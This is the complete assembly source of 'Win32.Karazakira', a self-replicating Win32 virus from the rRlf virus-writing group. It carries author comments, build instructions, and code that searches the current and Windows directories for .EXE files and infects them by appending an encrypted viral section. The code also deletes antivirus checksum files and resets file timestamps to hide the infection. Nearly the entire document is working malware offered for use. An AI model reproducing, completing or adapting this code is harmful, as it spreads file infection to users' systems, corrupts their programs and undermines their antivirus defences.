; _ __ ____ __ ___ __ _ _ ____ __ ; | |/\ / \ | _ \ / \ / _ \ / \ | |/\ | | | _ \ / \ ; | _/ | || | | / | || | |// / | || | | _/ | | | / | || | ; | \ | | | |\ \ | | / /|\ | | | \ | | | |\ \ | | ; |_|\/ |_||_| |_||_| |_||_| /____/ |_||_| |_|\/ |_| |_||_| |_||_| ; By Psychologic/rRlf ; ; Kara-Intro : ; ; This is my 3rd win32asm virus, I named it as an Indian's ring "KARAZAKIRA" ; which belived can call a soul from the deathman (a man who has been die) ; well, I think this is unique name. ; Workz : ; ; When Karazakira file executed, Karazakira searches for 4 PE *.EXE files in the current ; and windows directory. Those files will be infected by adding a new section called ; ".Karazakira" (called in infect section as ptr [edi], "raK."). ; File modification works by direct access, not by memory mapping (Bad idea right..??) ; well it just for different touch, hehe :P ; Feature : ; ; * full Win32 compatible ; * encrypted using DIV algorithm ; * Infecting windows directory ; * Deleting some AV checksum files ; Compile : ; ; tasm32 /mx /m karazakira.asm ; tlink32 /Tpe /aa karazakira.obj,,, import32.lib ; ==================================================================================== ; ==================================================================================== ; ; ==================================================================================== ; ==================================================================================== length_virus_file EQU (end_static - start) length_virus_mem EQU (end_mem - start) length_encrypted EQU (end_encrypted - encrypted) length_PE_header EQU 1000 Extrn MessageBoxA:Proc Extrn ExitProcess:Proc .386p .model flat .data start: pushad pushfd db 0BDh delta_offset dd 0 lea esi, [ebp+offset encrypted] mov edi, esi mov ecx, length_encrypted / 8 db 0BBh crypt_key dd 0 rush_code: copyright db "Win32.Karazakira By Psychologic", 0 db "On Friday, second January '05 - Depok City, Indonesia", 0 GetProcAddress db "GetProcAddress", 0 l_GPA = $ - offset GetProcAddress FindFirstFileA db "FindFirstFileA", 0 FindNextFileA db "FindNextFileA", 0 FindClose db "FindClose", 0 CreateFileA db "CreateFileA", 0 CloseHandle db "CloseHandle", 0 ReadFile db "ReadFile", 0 WriteFile db "WriteFile", 0 DeleteFileA db "DeleteFileA", 0 SetFilePointer db "SetFilePointer", 0 SetFileAttributesA db "SetFileAttributesA", 0 SetFileTime db "SetFileTime", 0 SetCurrentDirectoryA db "SetCurrentDirectoryA", 0 GetCurrentDirectoryA db "GetCurrentDirectoryA", 0 GetWindowsDirectoryA db "GetWindowsDirectoryA", 0 GetSystemDirectoryA db "GetSystemDirectoryA", 0 GetTickCount db "GetTickCount", 0 anti_vir_dat db "ANTI-VIR.DAT", 0 chklist_ms db "CHKLIST.MS", 0 chklist_cps db "CHKLIST.CPS", 0 avp_crc db "AVP.CRC", 0 orig_eip dd offset quit_1st_gen filemask db "*.EXE", 0 new_section_header: db ".Karazakira", 0, 0 VirtualSize dd length_virus_mem VirtualAddress dd 0 PhysicalSize dd length_virus_file PhysicalAddress dd 0 dd 0, 0, 0 dd 0E0000020h if ((($-encrypted) mod 8) NE 0) db (8-(($-encrypted) mod 8)) dup(0) endif decrypt: lodsd xchg eax, edx lodsd cmp edx, ebx JA no_mul push ebx push edx mul ebx pop ebx add eax, ebx adc edx, 0 pop ebx stosd xchg eax, edx stosd LOOP decrypt JMP encrypted no_mul: stosd xchg eax, edx stosd LOOP decrypt encrypted: mov eax, [ebp+offset orig_eip] mov [ebp+offset host_entry], eax push offset seh_handler push dword ptr fs:[0] mov fs:[0], esp mov eax, [esp+11*4] scan_kernel: cmp word ptr [eax], "ZM" JNE kernel_not_found mov ebx, [eax+3Ch] add ebx, eax cmp dword ptr [ebx], "EP" JE kernel32_found kernel_not_found: dec eax JMP scan_kernel kernel32_found: mov [ebp+offset kernel32], eax mov ebx, [ebx+120] add ebx, eax mov edx, [ebx+20h] add edx, eax mov ecx, [ebx+18h] GPA_search: push ecx mov esi, [edx] add esi, eax lea edi, [ebp+offset GetProcAddress] mov ecx, l_GPA cld rep cmpsb pop ecx JE GPA_found inc edx inc edx inc edx inc edx LOOP GPA_search GPA_not_found: JMP return_to_host GPA_found: mov edx, [ebx+18h] sub edx, ecx shl edx, 1 add edx, [ebx+24h] add edx, eax xor ecx, ecx mov cx, [edx] shl ecx, 2 add ecx, [ebx+1Ch] add ecx, eax mov ebx, [ecx] add ebx, eax mov [ebp+offset GPA_addr], ebx lea eax, [ebp+offset curdir] push eax push 260 lea eax, [ebp+offset GetCurrentDirectoryA] call call_API push 260 lea eax, [ebp+offset windir] push eax lea eax, [ebp+offset GetWindowsDirectoryA] call call_API lea eax, [ebp+offset windir] push eax lea eax, [ebp+offset SetCurrentDirectoryA] call call_API call infect_dir lea eax, [ebp+offset curdir] push eax lea eax, [ebp+offset SetCurrentDirectoryA] call call_API call infect_dir return_to_host: pop dword ptr fs:[0] pop eax popfd popad db 068h host_entry dd 0 ret seh_handler: mov esp, [esp+8] JMP return_to_host infect_dir: mov dword ptr [ebp+infectioncount], 4 lea eax, [ebp+offset anti_vir_dat] call kill_file lea eax, [ebp+offset chklist_ms] call kill_file lea eax, [ebp+offset chklist_cps] call kill_file lea eax, [ebp+offset avp_crc] call kill_file lea eax, [ebp+offset find_data] push eax lea eax, [ebp+offset filemask] push eax lea eax, [ebp+offset FindFirstFileA] call call_API mov [ebp+offset search_handle], eax inc eax JZ end_infect_dir infect: push 80h lea eax, [ebp+offset FileName] push eax lea eax, [ebp+offset SetFileAttributesA] call call_API push 0 push 80h push 3 push 0 push 0 push 0C0000000h lea eax, [ebp+offset FileName] push eax lea eax, [ebp+offset CreateFileA] call call_API mov [ebp+offset file_handle], eax inc eax JZ restore_attributes push 0 lea eax, [ebp+offset bytes_read] push eax push 64 lea eax, [ebp+offset dos_header] push eax push [ebp+file_handle] lea eax, [ebp+offset ReadFile] call call_API cmp word ptr [ebp+offset exe_marker], "ZM" JNE close push 0 push 0 push dword ptr [ebp+offset new_header] push dword ptr [ebp+offset file_handle] lea eax, [ebp+offset SetFilePointer] call call_API push 0 lea eax, [ebp+offset bytes_read] push eax push length_pe_header lea eax, [ebp+offset pe_header] push eax push dword ptr [ebp+file_handle] lea eax, [ebp+offset ReadFile] call call_API cmp dword ptr [ebp+offset pe_marker], "EP" JNE close test word ptr [ebp+offset flags], 0010000000000000b JNZ close lea ebx, [ebp+offset optional_header] add bx, word ptr [ebp+offset SizeOfOptHeader] xor eax, eax mov ax, word ptr [ebp+offset NumberOfSections] dec eax mov ecx, 40 mul ecx add eax, ebx mov edi, eax cmp dword ptr [edi], "raK." JE close mov eax, [ebp+offset EntryPoint] add eax, [ebp+offset ImageBase] mov [ebp+offset orig_eip], eax inc word ptr [ebp+offset NumberOfSections] mov eax, [edi+12] add eax, [edi+8] mov ebx, [ebp+offset SectionAlign] call align_EAX mov [ebp+offset VirtualAddress], eax mov [ebp+offset EntryPoint], eax add eax, [ebp+offset ImageBase] sub eax, offset start mov [ebp+offset delta_offset], eax mov eax, length_virus_mem call align_EAX add dword ptr [ebp+offset SizeOfImage], EAX mov eax, [edi+20] add eax, [edi+16] mov ebx, [ebp+offset FileAlign] call align_EAX mov [ebp+offset PhysicalAddress], eax push 0 push 0 push eax push dword ptr [ebp+offset file_handle] lea eax, [ebp+offset SetFilePointer] call call_API mov eax, length_virus_file call align_EAX mov [ebp+PhysicalSize], eax mov ecx, 40 lea esi, [ebp+offset new_section_header] add edi, ecx cld pusha xor eax, eax repe scasb popa JNE close rep movsb push eax lea eax, [ebp+offset GetTickCount] call call_API mov ebx, eax ror eax, 8 xor ebx, eax mov [ebp+offset crypt_key], ebx lea esi, [ebp+offset start] lea edi, [ebp+offset crypt_buffer] mov ecx, length_virus_file rep movsb lea esi, [ebp+offset crypt_buffer+(encrypted-start)] mov edi, esi mov cx, length_encrypted / 8 encrypt: lodsd xchg eax, edx lodsd xchg eax, edx cmp edx, ebx JA no_div div ebx no_div: xchg eax, edx stosd xchg eax, edx stosd loop encrypt pop eax push 0 lea ecx, [ebp+offset bytes_read] push ecx push eax lea eax, [ebp+offset crypt_buffer] push eax push dword ptr [ebp+file_handle] lea eax, [ebp+offset WriteFile] call call_API push 0 push 0 push dword ptr [ebp+offset new_header] push dword ptr [ebp+offset file_handle] lea eax, [ebp+offset SetFilePointer] call call_API push 0 lea eax, [ebp+offset bytes_read] push eax push length_pe_header lea eax, [ebp+offset pe_header] push eax push dword ptr [ebp+file_handle] lea eax, [ebp+offset WriteFile] call call_API dec dword ptr [ebp+infectioncount] close: lea eax, [ebp+offset LastWriteTime] push eax lea eax, [ebp+offset LastAccessTime] push eax lea eax, [ebp+offset CreationTime] push eax push dword ptr [ebp+offset file_handle] lea eax, [ebp+offset SetFileTime] call call_API push dword ptr [ebp+offset file_handle] lea eax, [ebp+offset CloseHandle] call call_API restore_attributes: push dword ptr [ebp+offset FileAttributes] lea eax, [ebp+offset FileName] push eax lea eax, [ebp+offset SetFileAttributesA] call call_API find_next: mov ecx, [ebp+infectioncount] JCXZ close_find lea eax, [ebp+offset find_data] push eax push dword ptr [ebp+offset search_handle] lea eax, [ebp+offset FindNextFileA] call call_API dec eax JZ infect close_find: push dword ptr [ebp+offset search_handle] lea eax, [ebp+offset FindClose] call call_API end_infect_dir: ret kill_file: push eax push 80h push eax lea eax, [ebp+offset SetFileAttributesA] call call_API lea eax, [ebp+offset DeleteFileA] call call_API RET call_API: push eax push dword ptr [ebp+offset kernel32] call [ebp+offset GPA_addr] JMP eax align_EAX: xor edx, edx div ebx or edx, edx JZ no_round_up inc eax no_round_up: mul ebx RET end_encrypted: end_static: heap: crypt_buffer db length_virus_file dup(?) padding db 1024 dup(?) windir db 260 dup(?) curdir db 260 dup(?) kernel32 dd ? GPA_addr dd ? search_handle dd ? file_handle dd ? bytes_read dd ? infectioncount dd ? find_data: FileAttributes dd ? CreationTime dq ? LastAccessTime dq ? LastWriteTime dq ? FileSize dq ? wfd_reserved dq ? FileName db 260 dup(?) DosFileName db 14 dup(?) dos_header: exe_marker dw ? dosheader_shit db 58 dup(?) new_header dd ? pe_header: pe_marker dd ? machine dw ? NumberOfSections dw ? TimeDateStamp dd ? DebugShit dq ? SizeOfOptHeader dw ? flags dw ? optional_header: optional_magic dw ? linkerversion dw ? SizeOfCode dd ? SizeOfDATA dd ? SizeOfBSS dd ? EntryPoint dd ? BaseOfCode dd ? BaseOfData dd ? ImageBase dd ? SectionAlign dd ? FileAlign dd ? OSVersion dd ? OurVersion dd ? SubVersion dd ? reserved1 dd ? SizeOfImage dd ? SizeOfHeader dd ? Checksum dd ? org offset pe_header+length_pe_header end_mem: .code start_1st_gen: pushad pushfd xor ebp, ebp JMP encrypted quit_1st_gen: push 0 push offset caption push offset message push 0 call MessageBoxA push 0 call ExitProcess caption: db "Win32.Karazakira by Psychologic" db 0 message db "Freee palestine...freee palestine", 0 end start_1st_gen